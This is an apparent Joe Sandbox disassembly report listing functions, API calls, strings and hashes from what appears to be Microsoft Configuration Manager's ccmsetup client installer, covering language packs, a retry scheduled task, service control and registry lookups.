                                                                                          • ..\String.cpp, xrefs: 005F617B
                                                                                          • CCM::Utility::String::toAnsi, xrefs: 005F60CD
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F6186
                                                                                          • WideCharToMultiByte(0, 0, pszUnicodeString, -1, szAnsi, uLength, 0, 0) > 0, xrefs: 005F61D8
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F6121
                                                                                          • ..\String.cpp, xrefs: 005F61D2
                                                                                          • uLength > 0, xrefs: 005F611C
                                                                                          • ..\String.cpp, xrefs: 005F6132
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F61DD
                                                                                          • ..\String.cpp, xrefs: 005F61EE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$ByteCharMultiWide$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(szAnsi.resize(uLength) == true) != 0$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$CCM::Utility::String::toAnsi$WideCharToMultiByte(0, 0, pszUnicodeString, -1, szAnsi, uLength, 0, 0) > 0$uLength > 0
                                                                                          • API String ID: 3038791202-2707189638
                                                                                          • Opcode ID: 0a1136d33329037f6f49a9bf02e18f0283e8cbb291d9cc48066a4552d55152d6
                                                                                          • Instruction ID: aecc5caa9daceaa4ee0644ec8e764ee6909dca4ced6f286c0d88af2323a57648
                                                                                          • Opcode Fuzzy Hash: 0a1136d33329037f6f49a9bf02e18f0283e8cbb291d9cc48066a4552d55152d6
                                                                                          • Instruction Fuzzy Hash: 34312EF17C02597AD710ABA49C0BFBF7D6DEF41B10F148149BA50A72C2CAB95D00C365
                                                                                          Function 00596098 Relevance: 32.0, APIs: 3, Strings: 15, Instructions: 483threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005960A2
                                                                                            • Part of subcall function 0059E344: __EH_prolog3_catch.LIBCMT ref: 0059E34B
                                                                                            • Part of subcall function 005F4099: __EH_prolog3.LIBCMT ref: 005F40A0
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005961BF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059628F
                                                                                            • Part of subcall function 005F41CA: __EH_prolog3.LIBCMT ref: 005F41D1
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3Thread$H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s"%s" %s"%s"$%$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$ADDLOCAL=$CcmSetup::PrepareDeltaLangPackProperties$File %s is not a valid client language or update pack. Ignore it.$File %s is not a valid client language pack. Ignore it.$GetFileNameFromQualifiedPath(it->sFileName, sFileName)$GetInstalledLanguages(mapInstalledLangs)$PATCH=$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 1952430090-1002139096
                                                                                          • Opcode ID: fd78fc1edae5ceff14c264765022c7602634983596f4e04c75a407167674ccaa
                                                                                          • Instruction ID: b49b40843b0849c8da660e737cf6015cfe259e6ba5707598a8122b20828261f1
                                                                                          • Opcode Fuzzy Hash: fd78fc1edae5ceff14c264765022c7602634983596f4e04c75a407167674ccaa
                                                                                          • Instruction Fuzzy Hash: DD227871804258EADF21EBA4CD89BEEBFB8BF55304F1080D9E14967182DB745B88DF61
                                                                                          Function 005C627F Relevance: 31.6, APIs: 3, Strings: 15, Instructions: 145threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005C6286
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005B5FD5: __EH_prolog3_catch_GS.LIBCMT ref: 005B5FDC
                                                                                            • Part of subcall function 005B5FD5: GetCommandLineW.KERNEL32(00000054,005C62D8,?,CreateRetryWinSchedTask,00000078,0057BC8A,00000001), ref: 005B5FE7
                                                                                            • Part of subcall function 005B5FD5: CommandLineToArgvW.SHELL32(00000000,?,GetArgumentsFromCmdLine), ref: 005B601C
                                                                                            • Part of subcall function 005B5FD5: GetLastError.KERNEL32 ref: 005B602B
                                                                                            • Part of subcall function 005B5FD5: GetCurrentThreadId.KERNEL32 ref: 005B6061
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C6303
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C63FD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CommandH_prolog3_catch_Line$ArgvErrorH_prolog3Last
                                                                                          • String ID: %s%d$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$/PerformUpgrade$/RetryWinTask:$/UpgradeWinTask$/runservice$Configuration Manager Client Retry Task$CreateRetryWinSchedTask$CreateWinSchedTask(c_szRetryWinTaskName, sArguments, iDelayMinutes, sScheduledTimeUtc)$GetArgumentsFromCmdLine(sArguments)$wintask.cpp$wintask.cpp$wintask.cpp$wintask.cpp
                                                                                          • API String ID: 2069753108-34117576
                                                                                          • Opcode ID: a8cc7d4bf1c44ff5646f230ea368a90259db25164537b73b00bbd6058e7ebdb8
                                                                                          • Instruction ID: 1b029012f92ae8b81b7bf3ee2f7c0a4d2eb5ca09ec6825a796d33688799df15d
                                                                                          • Opcode Fuzzy Hash: a8cc7d4bf1c44ff5646f230ea368a90259db25164537b73b00bbd6058e7ebdb8
                                                                                          • Instruction Fuzzy Hash: FC51BE71D41288AEDB11EBE4C98AFEE7F79AF51700F148059F101A7182DB745B09CB61
                                                                                          Function 0063C2A8 Relevance: 31.6, APIs: 4, Strings: 14, Instructions: 129threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0063C2AF
                                                                                            • Part of subcall function 005F094C: __EH_prolog3_catch_GS.LIBCMT ref: 005F0956
                                                                                            • Part of subcall function 005F094C: GetCurrentThreadId.KERNEL32 ref: 005F09AC
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063C342
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063C3A1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063C3E5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$CCM::LocationServices::CcmGetADSiteName$CCM::LocationServices::LSGetADSiteName(sADSiteName)$LocationServices$ppszADSiteName!=0$sADSiteName.CoAllocString(ppszADSiteName)
                                                                                          • API String ID: 133077043-4075489097
                                                                                          • Opcode ID: ae9394fa65bf8dd81e7eedf7a591e8995a034136c1e2a922dd3cd169352fe85f
                                                                                          • Instruction ID: f69eaff8be4e01fa693a35a5f43cea3be5b9a55cb1d611683aa0525cf6535e88
                                                                                          • Opcode Fuzzy Hash: ae9394fa65bf8dd81e7eedf7a591e8995a034136c1e2a922dd3cd169352fe85f
                                                                                          • Instruction Fuzzy Hash: FF41F570D84358EADB11DBA4D906BEDBEB9BF20B24F188049F950B73C2C7B80A45C791
                                                                                          Function 0060E0EA Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 104servicethreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060E0F1
                                                                                          • OpenSCManagerW.ADVAPI32(?,?,00000000,CCM::Utility::CServiceControl::Open,00000018,0060D256,?,?,00000008,00000000,CCM::Utility::CServiceControl::CServiceControl,00000024,005BBF0D,ccmexec,00000010,00000000), ref: 0060E124
                                                                                          • GetLastError.KERNEL32 ref: 0060E133
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060E165
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000001,00000000), ref: 0060E1A7
                                                                                          • GetLastError.KERNEL32 ref: 0060E1B4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060E1E6
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 0060E235
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 0060E247
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Service$CloseCurrentErrorHandleLastOpenThread$H_prolog3_catchManager
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\ServiceControl.cpp$..\ServiceControl.cpp$..\ServiceControl.cpp$..\ServiceControl.cpp$CCM::Utility::CServiceControl::Open$m_hSCM != 0$m_hService != 0
                                                                                          • API String ID: 3383405293-1727363926
                                                                                          • Opcode ID: 866cc55f620eed1436a3ebc7805f74a87c8e69d9eac6f8a07111cc42468b09f5
                                                                                          • Instruction ID: 7f4c9e04c8a26d55b10fc559225a2ffbc611c4c626ab97f8b59c6ed235749db7
                                                                                          • Opcode Fuzzy Hash: 866cc55f620eed1436a3ebc7805f74a87c8e69d9eac6f8a07111cc42468b09f5
                                                                                          • Instruction Fuzzy Hash: 6C31F6B0980356EFD719AFB4CD09BAE7E66BF04711F04456AF940E32D1C7768A05CBA1
                                                                                          Function 005FB1B1 Relevance: 31.6, APIs: 7, Strings: 11, Instructions: 90threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005FB1BB
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(%SystemRoot%\ccmsetup\ccmsetup.exe,?,00000104,CCM::Utility::GetCcmSetupDirectory), ref: 005FB218
                                                                                          • GetLastError.KERNEL32 ref: 005FB226
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB25F
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(%SystemRoot%\ccmsetup\,?,00000104,CCM::Utility::GetCcmSetupDirectory), ref: 005FB291
                                                                                          • GetLastError.KERNEL32 ref: 005FB29B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB2D4
                                                                                          Strings
                                                                                          • ..\util.cpp, xrefs: 005FB267
                                                                                          • %SystemRoot%\ccmsetup\ccmsetup.exe, xrefs: 005FB213
                                                                                          • CCM::Utility::GetCcmSetupDirectory, xrefs: 005FB1E6
                                                                                          • ExpandEnvironmentStringsW( c_szCcmSetupFile, szCcmSetupDir, 260 ) > 0, xrefs: 005FB255
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005FB25A
                                                                                          • %SystemRoot%\ccmsetup\, xrefs: 005FB28C
                                                                                          • ..\util.cpp, xrefs: 005FB2DC
                                                                                          • ..\util.cpp, xrefs: 005FB24F
                                                                                          • ..\util.cpp, xrefs: 005FB2C4
                                                                                          • ExpandEnvironmentStringsW( c_szCcmSetupDir, szCcmSetupDir, 260 ) > 0, xrefs: 005FB2CA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005FB2CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentEnvironmentErrorExpandLastStringsThread$H_prolog3_catch_
                                                                                          • String ID: %SystemRoot%\ccmsetup\$%SystemRoot%\ccmsetup\ccmsetup.exe$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$CCM::Utility::GetCcmSetupDirectory$ExpandEnvironmentStringsW( c_szCcmSetupDir, szCcmSetupDir, 260 ) > 0$ExpandEnvironmentStringsW( c_szCcmSetupFile, szCcmSetupDir, 260 ) > 0
                                                                                          • API String ID: 1563877294-2181161838
                                                                                          • Opcode ID: 1ee670f8161a7762941b0b393b18537c06e426d23a3a324274f0e405ce1148eb
                                                                                          • Instruction ID: 0fbe0a252e4ba451552cb17ca768aed4c865b567b6695d7174e1ef9d4e92eb58
                                                                                          • Opcode Fuzzy Hash: 1ee670f8161a7762941b0b393b18537c06e426d23a3a324274f0e405ce1148eb
                                                                                          • Instruction Fuzzy Hash: C631F871A80369EAEB30BBB4AD4DBAE3D58BF54700F044056B944E71C1D7789D008665
                                                                                          Function 00646291 Relevance: 30.0, APIs: 3, Strings: 14, Instructions: 276threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0064629B
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006463C0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006464B4
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 005F4099: __EH_prolog3.LIBCMT ref: 005F40A0
                                                                                            • Part of subcall function 0061BFB3: __EH_prolog3_catch.LIBCMT ref: 0061BFBA
                                                                                            • Part of subcall function 0061BFB3: GetCurrentThreadId.KERNEL32 ref: 0061C014
                                                                                          Strings
                                                                                          • regKey.Open( (( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKeyPath_CCM, ((((0x00020000L)) | (0x0001) | (0x0008) | (0x0010)) & , xrefs: 006463B6
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006464AF
                                                                                          • LSGetLookupMPListFromRegistry, xrefs: 00646348
                                                                                          • ..\lsad.cpp, xrefs: 006464BC
                                                                                          • ..\lsad.cpp, xrefs: 006463C8
                                                                                          • LSGetLookupMPListFromRegistry: Failed to get lookup MP list from Registry (%08lX), xrefs: 00646653
                                                                                          • CCM::LocationServices::LSGetLookupMPListFromRegistry, xrefs: 00646303
                                                                                          • Software\Microsoft\CCM, xrefs: 0064637A
                                                                                          • ..\lsad.cpp, xrefs: 006464A4
                                                                                          • LookupMPList, xrefs: 006463F1
                                                                                          • sMPList.tokenize(L";", arrLookupMPs), xrefs: 006464AA
                                                                                          • ..\lsad.cpp, xrefs: 006463B0
                                                                                          • Retrieved lookup MP list [%s] from Registry, xrefs: 0064645E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006463BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$CloseH_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$CCM::LocationServices::LSGetLookupMPListFromRegistry$LSGetLookupMPListFromRegistry$LSGetLookupMPListFromRegistry: Failed to get lookup MP list from Registry (%08lX)$LookupMPList$Retrieved lookup MP list [%s] from Registry$Software\Microsoft\CCM$regKey.Open( (( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKeyPath_CCM, ((((0x00020000L)) | (0x0001) | (0x0008) | (0x0010)) & $sMPList.tokenize(L";", arrLookupMPs)
                                                                                          • API String ID: 1992077435-302902927
                                                                                          • Opcode ID: 09181395a39437be603fd8246731ff778fa4b6613107f33471a9f5662db6e574
                                                                                          • Instruction ID: 0acc20443456d17f1fdd59add9dedc3a7fa763c9cb43dc0858f6f78890277d94
                                                                                          • Opcode Fuzzy Hash: 09181395a39437be603fd8246731ff778fa4b6613107f33471a9f5662db6e574
                                                                                          • Instruction Fuzzy Hash: 4CB19E70D01258EAEF11EBA4CD49BDDBFB5BB51304F148099E105B7282DBB85B48CB62
                                                                                          Function 005A20F5 Relevance: 29.9, APIs: 3, Strings: 14, Instructions: 144threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005A20FC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A2229
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A22AD
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • GetClientUpgradeTattoo(bExcluded), xrefs: 005A221F
                                                                                          • 0l, xrefs: 005A2260
                                                                                          • Client is in the upgrade exclusion collection. Stop proceeding., xrefs: 005A21DD, 005A22EC
                                                                                          • setupenv.cpp, xrefs: 005A2219
                                                                                          • CSetupEnvironment::IsExcludedFromUpgrade, xrefs: 005A2107
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A22A8
                                                                                          • setupenv.cpp, xrefs: 005A229D
                                                                                          • setupenv.cpp, xrefs: 005A2231
                                                                                          • setupenv.cpp, xrefs: 005A22B5
                                                                                          • Client is not installed yet. Ignore all upgrade exclusion flags., xrefs: 005A214E
                                                                                          • IsExcludedFromUpgradeFromPolicy(bExcluded), xrefs: 005A22A3
                                                                                          • ,/l, xrefs: 005A21CF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A2224
                                                                                          • Client is stamped with /alwaysexcludeupgrade. Stop proceeding., xrefs: 005A21A2, 005A226E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$,/l$CSetupEnvironment::IsExcludedFromUpgrade$Client is in the upgrade exclusion collection. Stop proceeding.$Client is not installed yet. Ignore all upgrade exclusion flags.$Client is stamped with /alwaysexcludeupgrade. Stop proceeding.$GetClientUpgradeTattoo(bExcluded)$IsExcludedFromUpgradeFromPolicy(bExcluded)$setupenv.cpp$setupenv.cpp$setupenv.cpp$setupenv.cpp$0l
                                                                                          • API String ID: 3454896115-1730886924
                                                                                          • Opcode ID: 84f9322087bcd017b3070099bc35ac6848527884b4863c9509f8c1756eb4cd6f
                                                                                          • Instruction ID: a074cf9984e9b3e3c4369661404f9aff494a8c04177348dbc4d7fb503f178800
                                                                                          • Opcode Fuzzy Hash: 84f9322087bcd017b3070099bc35ac6848527884b4863c9509f8c1756eb4cd6f
                                                                                          • Instruction Fuzzy Hash: 8151C17198435AAAEB20EBA4C81BFFD7FB1BF52B04F144009E9407B2C2C7B95949C791
                                                                                          Function 005BC294 Relevance: 29.9, APIs: 3, Strings: 14, Instructions: 105threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005BC29B
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BC31A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BC389
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
